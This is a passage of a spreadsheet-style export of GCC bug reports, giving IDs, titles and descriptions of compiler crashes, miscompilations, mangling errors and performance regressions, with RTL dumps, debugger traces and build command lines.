        (reg:SI 28 %r28)) 37 {*pa.md:2543} (expr_list:REG_DEAD (reg:SI 28 %r28)
        (nil)))
(insn 41 40 51 4 ../../../gcc/libgcc/../gcc/unwind.inc:215 (set (reg/v/f:SI 94 [ handler ])
        (mem/s/f/c:SI (plus:SI (reg/f:SI 3 %r3)
                (const_int 860 [0x35c])) [4 cur_context.ra+0 S4 A32])) 37 {*pa.md:2543} (nil))
(insn 51 41 52 4 ../../../gcc/libgcc/../gcc/unwind.inc:216 (clobber (reg/i:SI 28 %r28 [  ])) -1 (expr_list:REG_UNUSED (reg/i:SI 28 %r28 [  ])
        (nil)))
(insn 52 51 53 4 ../../../gcc/libgcc/../gcc/unwind.inc:216 (clobber (reg:SI 99 [  ])) -1 (expr_list:REG_UNUSED (reg:SI 99 [  ])
        (nil)))
(insn 53 52 55 4 ../../../gcc/libgcc/../gcc/unwind.inc:216 (set (reg:SI 29 %r29 [ offset ])
        (reg/v:SI 95 [ offset ])) 37 {*pa.md:2543} (expr_list:REG_DEAD (reg/v:SI 95 [ offset ])
        (nil)))
 End of basic block 4 -&gt; ( 5)
 lr  out       3 [%r3] 19 [%r19] 29 [%r29] 30 [%r30] 99
 live  out     3 [%r3] 19 [%r19] 29 [%r29] 30 [%r30]
 Succ edge  5 [100.0%]  (fallthru)
 Start of basic block ( 3 4) -&gt; 5
 bb 5 artificial_defs: { }
 bb 5 artificial_uses: { u76(3){ }u77(19){ }u78(30){ }}
 lr  in        3 [%r3] 19 [%r19] 29 [%r29] 30 [%r30] 99
 lr  use       3 [%r3] 19 [%r19] 30 [%r30] 99
 lr  def       28 [%r28]
 live  in      3 [%r3] 19 [%r19] 29 [%r29] 30 [%r30] 99
 live  gen     28 [%r28]
 live  kill
 Pred edge  3 [100.0%]  (fallthru)
 Pred edge  4 [100.0%]  (fallthru)
(code_label 55 53 66 5 548  [0 uses])
(note 66 55 56 5 [bb 5] NOTE_INSN_BASIC_BLOCK)
(insn 56 66 62 5 ../../../gcc/libgcc/../gcc/unwind.inc:216 (set (reg/i:SI 28 %r28 [  ])
        (reg:SI 99 [  ])) 37 {*pa.md:2543} (expr_list:REG_DEAD (reg:SI 99 [  ])
        (nil)))
(insn 62 56 0 5 ../../../gcc/libgcc/../gcc/unwind.inc:216 (use (reg/i:SI 28 %r28 [  ])) -1 (nil))
 End of basic block 5 -&gt; ( 1)
 lr  out       3 [%r3] 19 [%r19] 28 [%r28] 29 [%r29] 30 [%r30]
 live  out     3 [%r3] 19 [%r19] 28 [%r28] 29 [%r29] 30 [%r30]
 Succ edge  EXIT [100.0%]  (fallthru)
starting the processing of deferred insns
deleting insn with uid = 54.
ending the processing of deferred insns</t>
  </si>
  <si>
    <t>GCC-23071</t>
  </si>
  <si>
    <t>Darwin alignment ignores attribute packed for first 'double' element of a struct</t>
  </si>
  <si>
    <t>Darwin ignores the alignment/packed attributes on this structure forcing the
structure to have 8-byte alignment and 16-byte size:
---
struct Test {
  double D __attribute__((packedaligned(4)))
  short X
}
---
Ian Lance Taylor did a great analysis of the history of this tracking it back
to a patch by David Edelsohn in 1996.  The analysis is here:
http://gcc.gnu.org/ml/gcc-help/2005-07/msg00280.html
-Chris</t>
  </si>
  <si>
    <t>GCC-13689</t>
  </si>
  <si>
    <t>GGC PCH breaks aliasing</t>
  </si>
  <si>
    <t>Parsing invokes make_decl_rtl() which creates alias sets.  The references to 
the alias sets are saved in PCH.  When PCH is restored we end up with 
references to alias sets that don't exist or worse when we create more alias 
sets we end up with things assigend to the same alias set that don't actually 
have the same alias set.
The following example shows new_alias_set() being invoked from make_decl_rtl() 
during parsing when generating PCH:
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /gcc/dje/build/powerpc-ibm-aix5.1.0.0-20040113/gcc/cc1plus -qu
iet -nostdinc++ -isystem /gcc/dje/install/powerpc-ibm-aix5.1.0.0-20040113/powerp
c-ibm-aix5.1.0.0/include -isystem /gcc/dje/install/powerpc-ibm-aix5.1.0.0-200401
13/powerpc-ibm-aix5.1.0.0/sys-include -Winvalid-pch -Wno-deprecated -g -O2 -I/gc
c/dje/build/powerpc-ibm-aix5.1.0.0-20040113/powerpc-ibm-aix5.1.0.0/libstdc++-v3/
include/powerpc-ibm-aix5.1.0.0 -I/gcc/dje/build/powerpc-ibm-aix5.1.0.0-20040113/
powerpc-ibm-aix5.1.0.0/libstdc++-v3/include -I/gcc/dje/src/libstdc++-v3/libsupc+
+ /gcc/dje/src/libstdc++-v3/include/stdc++.h -O2 -g -o ./O2g
Breakpoint 4 new_alias_set () at /gcc/dje/src/gcc/alias.c:599
599       if (flag_strict_aliasing)
(gdb) where
#0  new_alias_set () at /gcc/dje/src/gcc/alias.c:599
#1  0x1018ff50 in get_alias_set (t=0x30313200) at /gcc/dje/src/gcc/alias.c:580
#2  0x101bbcc8 in set_mem_attributes_minus_bitpos (ref=0x302daf50
    t=0x30312f80 objectp=1 bitpos=0) at /gcc/dje/src/gcc/emit-rtl.c:1559
#3  0x101d1d34 in make_decl_rtl (decl=0x30312f80
    asmspec=0x1048a17c xxxxb 't'  cccccddddddddddrrrrrrre
eeeeeeeeexe '2'  11111122122222221eeeeee '&lt;' &lt;repeats 13
 times&gt; 2 x
rceeeerreeeedxdxttttttdexexxe1...) at /gcc/dje/src/gcc/varasm.c:868
#4  0x101d305c in assemble_external (decl=0x30312f80)
    at /gcc/dje/src/gcc/varasm.c:1635
#5  0x100ba0e4 in dfs_initialize_vtbl_ptrs (binfo=0x3030e4c0 data=0x3030e4c0)
    at /gcc/dje/src/gcc/cp/init.c:722
#6  0x1030f548 in dfs_walk_real (binfo=0x3030e4c0
    prefn=@0x2002cef4: 0x100b9ff4  postfn=0
    qfn=@0x2002a978: 0x10313910  data=0x30314390)
    at /gcc/dje/src/gcc/cp/search.c:1641
The following example shows the alias set value causing the failure on AIX 
appearing in memory restored by PCH:
Breakpoint 4 get_alias_set (t=0x3234e400) at /gcc/dje/src/gcc/alias.c:452
452       if (! flag_strict_aliasing || t == error_mark_node
(gdb) print t-&gt;type.alias_set
$1 = 7
(gdb) print &amp;(t-&gt;type.alias_set)
$2 = (long long *) 0x3234e450
Breakpoint 5 gt_pch_restore (f=0xf01aec98)
    at /gcc/dje/src/gcc/ggc-common.c:555
555       for (rt = gt_ggc_deletable_rtab *rt rt++)
(gdb) print *(long long *) 0x3234e450
Cannot access memory at address 0x3234e450
(gdb) finish
Run till exit from #0  gt_pch_restore (f=0xf01aec98)
    at /gcc/dje/src/gcc/ggc-common.c:555
0x1039e7c4 in c_common_read_pch (pfile=0x2009b8f8
    name=0x200c1208 /gcc/dje/build/powerpc-ibm-aix5.1.0.0-20040113/powerpc-ibm-
aix5.1.0.0/libstdc++-v3/include/powerpc-ibm-aix5.1.0.0/bits/stdc++.h
    fd=16384 orig_name=0x32309000 1Ã¢\2001r\214)
    at /gcc/dje/src/gcc/c-pch.c:388
388       gt_pch_restore (f)
(gdb) print *(long long *) 0x3234e450
$3 = 7</t>
  </si>
  <si>
    <t>GCC-33978</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/tree-ssa/pr33723.c scan-tree-dump-times t.f.f1 = 1 4</t>
  </si>
  <si>
    <t>Executing on host: /home/dave/gcc-4.3/objdir/gcc/xgcc -B/home/dave/gcc-4.3/objdi
r/gcc/ /home/dave/gcc-4.3/gcc/gcc/testsuite/gcc.dg/tree-ssa/pr33723.c   -O2 -fdu
mp-tree-gimple -fno-show-column -S  -o pr33723.s    (timeout = 300)
PASS: gcc.dg/tree-ssa/pr33723.c (test for excess errors)
PASS: gcc.dg/tree-ssa/pr33723.c scan-tree-dump-times t = {} 3
FAIL: gcc.dg/tree-ssa/pr33723.c scan-tree-dump-times t.f.f1 = 1 4
FAIL: gcc.dg/tree-ssa/pr33723.c scan-tree-dump-times t.f.f8 = 8 4
Don't see the expect strings in dump.  I believe that this test is
also failing on mips.</t>
  </si>
  <si>
    <t>GCC-42762</t>
  </si>
  <si>
    <t>ICE in get_resolution() when compiling a C++ program with -flto -fuse-linker-plugin</t>
  </si>
  <si>
    <t>cat bug.cc
int main(void)
{
    try { } catch (int) { }
    return 0
}
g++ -flto -fuse-linker-plugin bug.cc
lto1: internal compiler error: in get_resolution at lto-streamer-in.c:1519
Please submit a full bug report
with preprocessed source if appropriate.
GCC 4.5.0 20100114.</t>
  </si>
  <si>
    <t>GCC-18421</t>
  </si>
  <si>
    <t>ICE in reload_cse_simplify_operands at postreload.c:391</t>
  </si>
  <si>
    <t>Hello
I tried to compile the newlib with -O1. I got
m68k-elf-gcc
-B/home/bwalle/src/packages/BUILD/newlib-1.12.0/m68k-elf/m5307/newlib/ -isystem
/home/bwalle/src/packages/BUILD/newlib-1.12.0/m68k-elf/m5307/newlib/targ-include
-isystem /home/bwalle/src/packages/BUILD/newlib-1.12.0/newlib/libc/include 
-m5307 -DPACKAGE=\newlib\ -DVERSION=\1.12.0\  -I.
-I../../../../.././newlib/libc/locale  -O2 -DCOMPACT_CTYPE
-DMISSING_SYSCALL_NAMES -fno-builtin    -O2 -O1  -O2 -O1  -m5307 -c
../../../../.././newlib/libc/locale/fix_grouping.c
../../../../.././newlib/libc/locale/fix_grouping.c: In function
`__fix_locale_grouping_str':
../../../../.././newlib/libc/locale/fix_grouping.c:82: Fehler: Befehl erfÃ¼llt
nicht seine Bedingungen:
(insn 217 106 107 12 (set (reg:QI 13 %a5)
        (mem:QI (reg/v/f:SI 9 %a1 [orig:32 src ] [32]) [0 S1 A8])) 33
{*m68k.md:826} (nil)
    (nil))
../../../../.././newlib/libc/locale/fix_grouping.c:82: interner Compiler-Fehler:
in reload_cse_simplify_operands bei postreload.c:391
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
It's newlib 1.12.0 so you should have the source. There are no errors with
default -O2 or -O0.</t>
  </si>
  <si>
    <t>bernhard.walle</t>
  </si>
  <si>
    <t>GCC-6828</t>
  </si>
  <si>
    <t>g++3 makes wrong mangled name for template cast operator</t>
  </si>
  <si>
    <t>1. The issue
In the given testcase for operator template  C::operator T () with 
T = {int} g++3 compiler produces the following mangled name:
    _ZN1CcviIiEEv
but it's expected to have mangled name _ZN1CcvT_IiEEv here.
--- testcase (fail.cpp) -------------------------------------
struct C {
  template 
  operator T ()
}
template 
C::operator T () { return 0 }
template C::operator int ()
--------------------------------------------------------------
2. Clarify the issue
Unfortunately the mangling grammer given in the ABI is ambiguous in this area so we need to think more about it.
First of all let's decompose the mangled name taking GCC's encoding (it does not matter which one to take).
We are interesting in the following parts of '_ZN1CcviIiEEv' mangled name:
	a) cvi		#  ::= cv 
	b) IiE		#  ::= I + E
In both parts value of  used to be the same. And it is really the same 8-).
But only one question is there: 
	Which part should be encoded/decoded first? (the hen or the egg)
As I can see part a) depends on type value of b). 
So the  in the a should be a reference to template argument from b.
3. Clarify compiler behaviour
Let's change our example to make the behaviour more clean and see what exactly compilers are doing. 
According to the ABI built-in types are not substituted so it's better to change built-in type 'int' to some class 'A'.
Now we that g++3 encodes operator as:
	_ZN1Ccv1AIS0_EEv
i.e. type 1A in the part (a) of mangled name becomes major one and part (b) reference it by 
While the correct code is:
	_ZN1CcvT_I1AEEv
where part (a) depends from type specified in part (b) so it reference it as .
4. Decoder
It's true that the 'c++filt' is not able to decode given names. But decoder is not guilty.
The root of the problem is the mangling grammer.
Release:
3.1
Environment:
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure
How-To-Repeat:
1. compile testcase 
    g++3 -c fail.cpp
2. get list of produced mangled names in the object file
    nm fail.o | grep _Z
3. You will see
**** T _ZN1CcviIiEEv
Which is wrong.</t>
  </si>
  <si>
    <t>grigory_zagorodnev</t>
  </si>
  <si>
    <t>GCC-44334</t>
  </si>
  <si>
    <t>rnflow.f90 ~27% slower with -fwhole-program -flto after revision 159852</t>
  </si>
  <si>
    <t>After revision 159852
Author:	pault
Date:	Wed May 26 05:11:04 2010 UTC (4 days 12 hours ago)
Changed paths:	4
Log Message:	
2010-05-26  Paul Thomas  
	PR fortran/40011
	* resolve.c (resolve_global_procedure): Resolve the gsymbol's
	namespace before trying to reorder the gsymbols.
2010-05-26  Paul Thomas  
	PR fortran/40011
	* gfortran.dg/whole_file_19.f90 : New test.
the executable of the polyhedron test rnflow.f90 is ~27% slower when compiled with -fwhole-program -flto:
[macbook] lin/test% gfcpf -v
Using built-in specs.
COLLECT_GCC=gfcpf
COLLECT_LTO_WRAPPER=/opt/gcc/gcc4.6pf/libexec/gcc/x86_64-apple-darwin10/4.6.0/lto-wrapper
Target: x86_64-apple-darwin10
Configured with: ../p_work/configure --prefix=/opt/gcc/gcc4.6pf --mandir=/opt/gcc/gcc4.6pf/share/man --infodir=/opt/gcc/gcc4.6pf/share/info --build=x86_64-apple-darwin10 --host=x86_64-apple-darwin10 --target=x86_64-apple-darwin10 --enable-languages=cfortran --with-gmp=/opt/sw64 --with-libiconv-prefix=/opt/sw64 --with-system-zlib --x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib --with-cloog=/opt/sw64 --with-ppl=/opt/sw64 --with-mpc=/opt/sw64 --enable-lto
Thread model: posix
gcc version 4.6.0 20100526 (experimental) [trunk revision 159851] (GCC) 
[macbook] lin/test% gfcpf -O3 -ffast-math -funroll-loops -fomit-frame-pointer rnflow.f90 
[macbook] lin/test% time a.out &gt; /dev/null
25.826u 0.686s 0:26.52 99.9%	0+0k 0+0io 0pf+0w
[macbook] lin/test% gfcpf -O3 -ffast-math -funroll-loops -fomit-frame-pointer -fwhole-file -flto rnflow.f90
[macbook] lin/test% time a.out &gt; /dev/null
25.506u 0.674s 0:26.19 99.9%	0+0k 0+0io 0pf+0w
[macbook] lin/test% gfcpf -O3 -ffast-math -funroll-loops -fomit-frame-pointer -fwhole-program -flto rnflow.f90
[macbook] lin/test% time a.out &gt; /dev/null
25.772u 0.678s 0:26.46 99.9%	0+0k 0+0io 0pf+0w
[macbook] lin/test% gfcp -v
Using built-in specs.
COLLECT_GCC=gfcp
COLLECT_LTO_WRAPPER=/opt/gcc/gcc4.6p/libexec/gcc/x86_64-apple-darwin10/4.6.0/lto-wrapper
Target: x86_64-apple-darwin10
Configured with: ../p_work/configure --prefix=/opt/gcc/gcc4.6p --mandir=/opt/gcc/gcc4.6p/share/man --infodir=/opt/gcc/gcc4.6p/share/info --build=x86_64-apple-darwin10 --host=x86_64-apple-darwin10 --target=x86_64-apple-darwin10 --enable-languages=cfortran --with-gmp=/opt/sw64 --with-libiconv-prefix=/opt/sw64 --with-system-zlib --x-includes=/usr/X11R6/include --x-libraries=/usr/X11R6/lib --with-cloog=/opt/sw64 --with-ppl=/opt/sw64 --with-mpc=/opt/sw64 --enable-lto
Thread model: posix
gcc version 4.6.0 20100526 (experimental) [trunk revision 159852] (GCC) 
[macbook] lin/test% gfcp -O3 -ffast-math -funroll-loops -fomit-frame-pointer rnflow.f90
[macbook] lin/test% time a.out &gt; /dev/null
25.841u 0.696s 0:26.54 99.9%	0+0k 0+0io 0pf+0w
[macbook] lin/test% gfcp -O3 -ffast-math -funroll-loops -fomit-frame-pointer -fwhole-file -flto rnflow.f90
[macbook] lin/test% time a.out &gt; /dev/null
25.540u 0.677s 0:26.22 99.9%	0+0k 0+0io 0pf+0w
[macbook] lin/test% gfcp -O3 -ffast-math -funroll-loops -fomit-frame-pointer -fwhole-program -flto rnflow.f90
[macbook] lin/test% time a.out &gt; /dev/null
32.627u 0.685s 0:33.31 99.9%	0+0k 0+0io 0pf+0w             &lt;---  ~27% slower
As it has been noticed previously the executable of fatigue.f90 is ~30% faster when compiled with -fwhole-program:
[macbook] lin/test% gfcp -O3 -ffast-math -funroll-loops -fomit-frame-pointer -fwhole-file -flto fatigue.f90
[macbook] lin/test% time a.out &gt; /dev/null
9.031u 0.006s 0:09.04 99.8%	0+0k 0+1io 0pf+0w
[macbook] lin/test% gfcp -O3 -ffast-math -funroll-loops -fomit-frame-pointer -fwhole-program fatigue.f90
[macbook] lin/test% time a.out &gt; /dev/null
6.448u 0.004s 0:06.47 99.5%	0+0k 0+1io 0pf+0w</t>
  </si>
  <si>
    <t>GCC-78106</t>
  </si>
  <si>
    <t>ASAN can't find heap-use-after-free with -O1</t>
  </si>
  <si>
    <t>Running following code snippet:
int *variable
void release()
{
  __builtin_free (variable)
}
int main2(int argc)
{
  *variable = 2
  if (argc &lt;= 5)
    asm volatile (call release)
  *variable = 2
  __builtin_abort ()
  return 0
}
int main(int argc char **argv)
{
  variable = __builtin_malloc (sizeof(int))
  return main2(argc)
}
$ gcc asm-test.c -fsanitize=address -O1 &amp;&amp; ./a.out 
Aborted (core dumped)
$ gcc asm-test.c -fsanitize=address -O0 &amp;&amp; ./a.out 
=================================================================
==7550==ERROR: AddressSanitizer: heap-use-after-free on address 0x60200000eff0 at pc 0x000000400885 bp 0x7fff26b46520 sp 0x7fff26b46518
WRITE of size 4 at 0x60200000eff0 thread T0
    #0 0x400884 in main2 (/tmp/a.out+0x400884)
    #1 0x4008be in main (/tmp/a.out+0x4008be)
    #2 0x7ff63783a290 in __libc_start_main (/lib64/libc.so.6+0x20290)
    #3 0x400719 in _start (/tmp/a.out+0x400719)
...
I'm having patch for that that I'll send shortly.</t>
  </si>
  <si>
    <t>GCC-30481</t>
  </si>
  <si>
    <t>Accepts namelist-group object with assumed character length</t>
  </si>
  <si>
    <t>Found at http://groups.google.com/group/comp.lang.fortran/browse_thread/thread/75b797b2d4257f74
subroutine foo(c)
  character*(*) c
  namelist /abc/ c
end subroutine
is accepted by gfortran. Other compilers give the correct error:
fortcom: Error: aaa.f line 3: A namelist-group-object must not be a variable with assumed character length (R544.1).   [ERRMSG]
Error: bbb.f90 line 4: Namelist-group-object C has assumed character length
Error: Variable 'c' at (1) cannot have a variable length and be in a NAMELIST
ERROR: C has the CHARACTER*(*) attribute therefore it must not be declared as a namelist-group-object.</t>
  </si>
  <si>
    <t>GCC-33295</t>
  </si>
  <si>
    <t>ICE in fold_const.c (fold_convert) when reordering USE statements</t>
  </si>
  <si>
    <t>The following code produces the error
internal compiler error: in fold_convert at fold-const.c:2626
when compiled with GCC trunk rev. 128037:
module A
  type A_type
    real comp
  end type
end module A
module B
contains
  function initA()
    use A
    implicit none
    type(A_type):: initA
    initA%comp=1.0
  end function
end module B
program C
use B
use A
implicit none
type(A_type):: A_var
A_var = initA()
end program C
The crucial part here are the USE statements in program C. The error only pops up when they appear as listed above. Exchanging them to
use A
use B
makes the error vanish. The error is also killed by
A_var = initA()
It happens for GCC 4.3.0 (trunk) as well as 4.1.3 and 4.2.1. The target system is i686-pc-linux-gnu.</t>
  </si>
  <si>
    <t>GCC-6674</t>
  </si>
  <si>
    <t>gcc-3.1 segfault</t>
  </si>
  <si>
    <t>gcc segfault appears when I tried to compile g++ part of gcc-3.1 -- namely file gcc-3.1/i686-pc-linux-gnu/libstdc++-v3/src/misc-inst.cc.
Release:
gcc-3.1
Environment:
Athlon-XP 1600
Linux rh-7.1
gcc-3.1
How-To-Repeat:
/usr/local/src/gcc/gcc-3.1/gcc/cc1plus -fpreprocessed misc-inst.ii -quiet -dumpbase misc-inst.cc -g -g -O2 -Wall -Wno-format -W -Wwrite-strings -Winline -version -fno-implicit-templates -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -fPIC -o misc-inst.s</t>
  </si>
  <si>
    <t>GCC-56738</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE in c-c++-common/torture/vshuf-v4di.c</t>
  </si>
  <si>
    <t>Created attachment 29729
Preprocessed file
Testcase ICEs on arm-none-eabi when compiled with -O1 (ICEs also with -O2 and -O3)
In file included from vshuf-v4di.c:19:0:
vshuf-main.inc: In function 'main':
vshuf-main.inc:26:1: internal compiler error: in df_insn_delete at df-scan.c:1162
 }
 ^
0x634b9c df_insn_delete(rtx_def*)
	$SOURCE/gcc/gcc/df-scan.c:1162
0x68b98a remove_insn(rtx_def*)
	$SOURCE/gcc/gcc/emit-rtl.c:4036
0x5f83be delete_insn(rtx_def*)
	$SOURCE/gcc/gcc/cfgrtl.c:167
0xd335b6 resolve_simple_move
	$SOURCE/gcc/gcc/lower-subreg.c:1072
0xd338b3 resolve_simple_move
	$SOURCE/gcc/gcc/lower-subreg.c:923
0xd34a13 decompose_multiword_subregs
	$SOURCE/gcc/gcc/lower-subreg.c:1563
0xd3528d rest_of_handle_lower_subreg2
	$SOURCE/gcc/gcc/lower-subreg.c:1682
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Bisection shows it started with r196977
Cross compiler configured with:
Target: arm-none-eabi
Configured with: $SOURCE/gcc/configure --target=arm-none-eabi --prefix=$SOURCE/build/install --with-gmp=$SOURCE/build/host-tools --with-mpfr=$SOURCE/build/host-tools --with-mpc=$SOURCE/build/host-tools --with-pkgversion=unknown --disable-shared --disable-nls --disable-threads --disable-tls --enable-checking=yes --enable-languages=c --with-newlib --with-fpu=neon --with-float=hard --with-arch=armv7-a
Thread model: single
gcc version 4.9.0 20130322 (experimental) (unknown)</t>
  </si>
  <si>
    <t>GCC-21379</t>
  </si>
  <si>
    <t>[4.0/4.1 Regression] GCC Internal Compiler Error</t>
  </si>
  <si>
    <t>When compiling a source file GCC 4.0.0 exit with an Internal compiler error.
This is the output of the `gcc -v` command:
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.0.0/configure --enable-shared --with-gnu-as
--with-gnu-ld --enable-threads=posix --enable-cpp --enable-languages=cc++java
--enable-interpreter --enable-java-net --with-x --with-java-awt=gtkxlib
--enable-nls --prefix=/usr
Thread model: posix
gcc version 4.0.0
This is the complete command line passed that triggers the bug:
gcc -pipe -funsigned-char -march=athlon-xp -O3 -pipe -fomit-frame-pointer
-ffast-math -mfpmath=sse387 -msse -mmmx -m3dnow -Wno-unused-parameter -Wall -W
-D_REENTRANT -DGAMEBLENDER=1 -DUSE_SUMO_SOLID -DNDEBUG -DINTERNATIONAL
-DFTGL_STATIC_LIBRARY -DNAN_BUILDINFO -Iintern/guardedalloc
-I/home/mjordan/Blender/build/linux2/source/blender/blenlib
-Isource/blender/blenlib -Isource/blender/blenlib
-I/home/mjordan/Blender/build/linux2/source/blender/makesdna
-Isource/blender/makesdna -Isource/blender/makesdna
-I/home/mjordan/Blender/build/linux2/source/blender/blenkernel
-Isource/blender/blenkernel -Isource/blender/blenkernel
-I/home/mjordan/Blender/build/linux2/source/blender/include
-Isource/blender/include -Isource/blender/include -Iintern/bmfont
-I/home/mjordan/Blender/build/linux2/source/blender/imbuf -Isource/blender/imbuf
-Isource/blender/imbuf
-I/home/mjordan/Blender/build/linux2/source/blender/render/extern/include
-Isource/blender/render/extern/include -Isource/blender/render/extern/include
-Iintern/bsp/extern
-I/home/mjordan/Blender/build/linux2/source/blender/renderconverter
-Isource/blender/renderconverter -Isource/blender/renderconverter
-I/home/mjordan/Blender/build/linux2/source/blender/radiosity/extern/include
-Isource/blender/radiosity/extern/include
-Isource/blender/radiosity/extern/include -Iintern/decimation/extern
-I/home/mjordan/Blender/build/linux2/source/blender/blenloader
-Isource/blender/blenloader -Isource/blender/blenloader
-I/home/mjordan/Blender/build/linux2/source/blender/python
-Isource/blender/python -Isource/blender/python
-I/home/mjordan/Blender/build/linux2/source/kernel/gen_system
-Isource/kernel/gen_system -Isource/kernel/gen_system -Iintern/SoundSystem
-I/home/mjordan/Blender/build/linux2/source/blender/readstreamglue
-Isource/blender/readstreamglue -Isource/blender/readstreamglue
-I/home/mjordan/Blender/build/linux2/source/blender/img -Isource/blender/img
-Isource/blender/img
-I/home/mjordan/Blender/build/linux2/source/blender/quicktime
-Isource/blender/quicktime -Isource/blender/quicktime -Iintern/ghost
-Iintern/opennl/extern -I/usr/include/python2.3 -I/usr/include/SDL
-I/usr/include -I/usr/X11R6/include
-I/home/mjordan/Blender/build/linux2/source/blender/ftfont
-Isource/blender/ftfont -Isource/blender/ftfont -c -o
/home/mjordan/Blender/build/linux2/source/blender/src/editipo.o
source/blender/src/editipo.c
This is the output the compiler generates after that command line:
source/blender/src/editipo.c: In function 'movekey_ipo':
source/blender/src/editipo.c:4395: internal compiler error: in fold_convert at
fold-const.c:1922
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
This is the complete output with the -v -save-temps flags added to the command line:
gcc -v -save-temps -pipe -funsigned-char -march=athlon-xp -O3 -pipe
-fomit-frame-pointer -ffast-math -mfpmath=sse387 -msse -mmmx -m3dnow
-Wno-unused-parameter -Wall -W -D_REENTRANT -DGAMEBLENDER=1 -DUSE_SUMO_SOLID
-DNDEBUG -DINTERNATIONAL -DFTGL_STATIC_LIBRARY -DNAN_BUILDINFO
-Iintern/guardedalloc
-I/home/mjordan/Blender/build/linux2/source/blender/blenlib
-Isource/blender/blenlib -Isource/blender/blenlib
-I/home/mjordan/Blender/build/linux2/source/blender/makesdna
-Isource/blender/makesdna -Isource/blender/makesdna
-I/home/mjordan/Blender/build/linux2/source/blender/blenkernel
-Isource/blender/blenkernel -Isource/blender/blenkernel
-I/home/mjordan/Blender/build/linux2/source/blender/include
-Isource/blender/include -Isource/blender/include -Iintern/bmfont
-I/home/mjordan/Blender/build/linux2/source/blender/imbuf -Isource/blender/imbuf
-Isource/blender/imbuf
-I/home/mjordan/Blender/build/linux2/source/blender/render/extern/include
-Isource/blender/render/extern/include -Isource/blender/render/extern/include
-Iintern/bsp/extern
-I/home/mjordan/Blender/build/linux2/source/blender/renderconverter
-Isource/blender/renderconverter -Isource/blender/renderconverter
-I/home/mjordan/Blender/build/linux2/source/blender/radiosity/extern/include
-Isource/blender/radiosity/extern/include
-Isource/blender/radiosity/extern/include -Iintern/decimation/extern
-I/home/mjordan/Blender/build/linux2/source/blender/blenloader
-Isource/blender/blenloader -Isource/blender/blenloader
-I/home/mjordan/Blender/build/linux2/source/blender/python
-Isource/blender/python -Isource/blender/python
-I/home/mjordan/Blender/build/linux2/source/kernel/gen_system
-Isource/kernel/gen_system -Isource/kernel/gen_system -Iintern/SoundSystem
-I/home/mjordan/Blender/build/linux2/source/blender/readstreamglue
-Isource/blender/readstreamglue -Isource/blender/readstreamglue
-I/home/mjordan/Blender/build/linux2/source/blender/img -Isource/blender/img
-Isource/blender/img
-I/home/mjordan/Blender/build/linux2/source/blender/quicktime
-Isource/blender/quicktime -Isource/blender/quicktime -Iintern/ghost
-Iintern/opennl/extern -I/usr/include/python2.3 -I/usr/include/SDL
-I/usr/include -I/usr/X11R6/include
-I/home/mjordan/Blender/build/linux2/source/blender/ftfont
-Isource/blender/ftfont -Isource/blender/ftfont -c -o
/home/mjordan/Blender/build/linux2/source/blender/src/editipo.o
source/blender/src/editipo.c
gcc: warning: -pipe ignored because -save-temps specified
Using built-in specs.
Target: i686-pc-linux-gnu
Configured with: ../gcc-4.0.0/configure --enable-shared --with-gnu-as
--with-gnu-ld --enable-threads=posix --enable-cpp --enable-languages=cc++java
--enable-interpreter --enable-java-net --with-x --with-java-awt=gtkxlib
--enable-nls --prefix=/usr
Thread model: posix
gcc version 4.0.0
 /usr/libexec/gcc/i686-pc-linux-gnu/4.0.0/cc1 -E -quiet -v -Iintern/guardedalloc
-I/home/mjordan/Blender/build/linux2/source/blender/blenlib
-Isource/blender/blenlib -Isource/blender/blenlib
-I/home/mjordan/Blender/build/linux2/source/blender/makesdna
-Isource/blender/makesdna -Isource/blender/makesdna
-I/home/mjordan/Blender/build/linux2/source/blender/blenkernel
-Isource/blender/blenkernel -Isource/blender/blenkernel
-I/home/mjordan/Blender/build/linux2/source/blender/include
-Isource/blender/include -Isource/blender/include -Iintern/bmfont
-I/home/mjordan/Blender/build/linux2/source/blender/imbuf
-Isource/blender/imbuf-Isource/blender/imbuf
-I/home/mjordan/Blender/build/linux2/source/blender/render/extern/include
-Isource/blender/render/extern/include -Isource/blender/render/extern/include
-Iintern/bsp/extern
-I/home/mjordan/Blender/build/linux2/source/blender/renderconverter
-Isource/blender/renderconverter -Isource/blender/renderconverter
-I/home/mjordan/Blender/build/linux2/source/blender/radiosity/extern/include
-Isource/blender/radiosity/extern/include
-Isource/blender/radiosity/extern/include -Iintern/decimation/extern
-I/home/mjordan/Blender/build/linux2/source/blender/blenloader
-Isource/blender/blenloader -Isource/blender/blenloader
-I/home/mjordan/Blender/build/linux2/source/blender/python
-Isource/blender/python -Isource/blender/python
-I/home/mjordan/Blender/build/linux2/source/kernel/gen_system
-Isource/kernel/gen_system -Isource/kernel/gen_system -Iintern/SoundSystem
-I/home/mjordan/Blender/build/linux2/source/blender/readstreamglue
-Isource/blender/readstreamglue -Isource/blender/readstreamglue
-I/home/mjordan/Blender/build/linux2/source/blender/img -Isource/blender/img
-Isource/blender/img
-I/home/mjordan/Blender/build/linux2/source/blender/quicktime
-Isource/blender/quicktime -Isource/blender/quicktime -Iintern/ghost
-Iintern/opennl/extern -I/usr/include/python2.3 -I/usr/include/SDL
-I/usr/include -I/usr/X11R6/include
-I/home/mjordan/Blender/build/linux2/source/blender/ftfont
-Isource/blender/ftfont -Isource/blender/ftfont -D_REENTRANT -DGAMEBLENDER=1
-DUSE_SUMO_SOLID -DNDEBUG -DINTERNATIONAL -DFTGL_STATIC_LIBRARY -DNAN_BUILDINFO
source/blender/src/editipo.c -march=athlon-xp -mfpmath=sse387 -msse -mmmx
-m3dnow -Wno-unused-parameter -Wall -W -funsigned-char
-fomit-frame-pointer-ffast-math -O3 -fpch-preprocess -o editipo.i
ignoring nonexistent directory
/usr/lib/gcc/i686-pc-linux-gnu/4.0.0/../../../../i686-pc-linux-gnu/include
ignoring duplicate directory source/blender/blenlib
ignoring duplicate directory source/blender/makesdna
ignoring duplicate directory source/blender/blenkernel
ignoring nonexistent directory
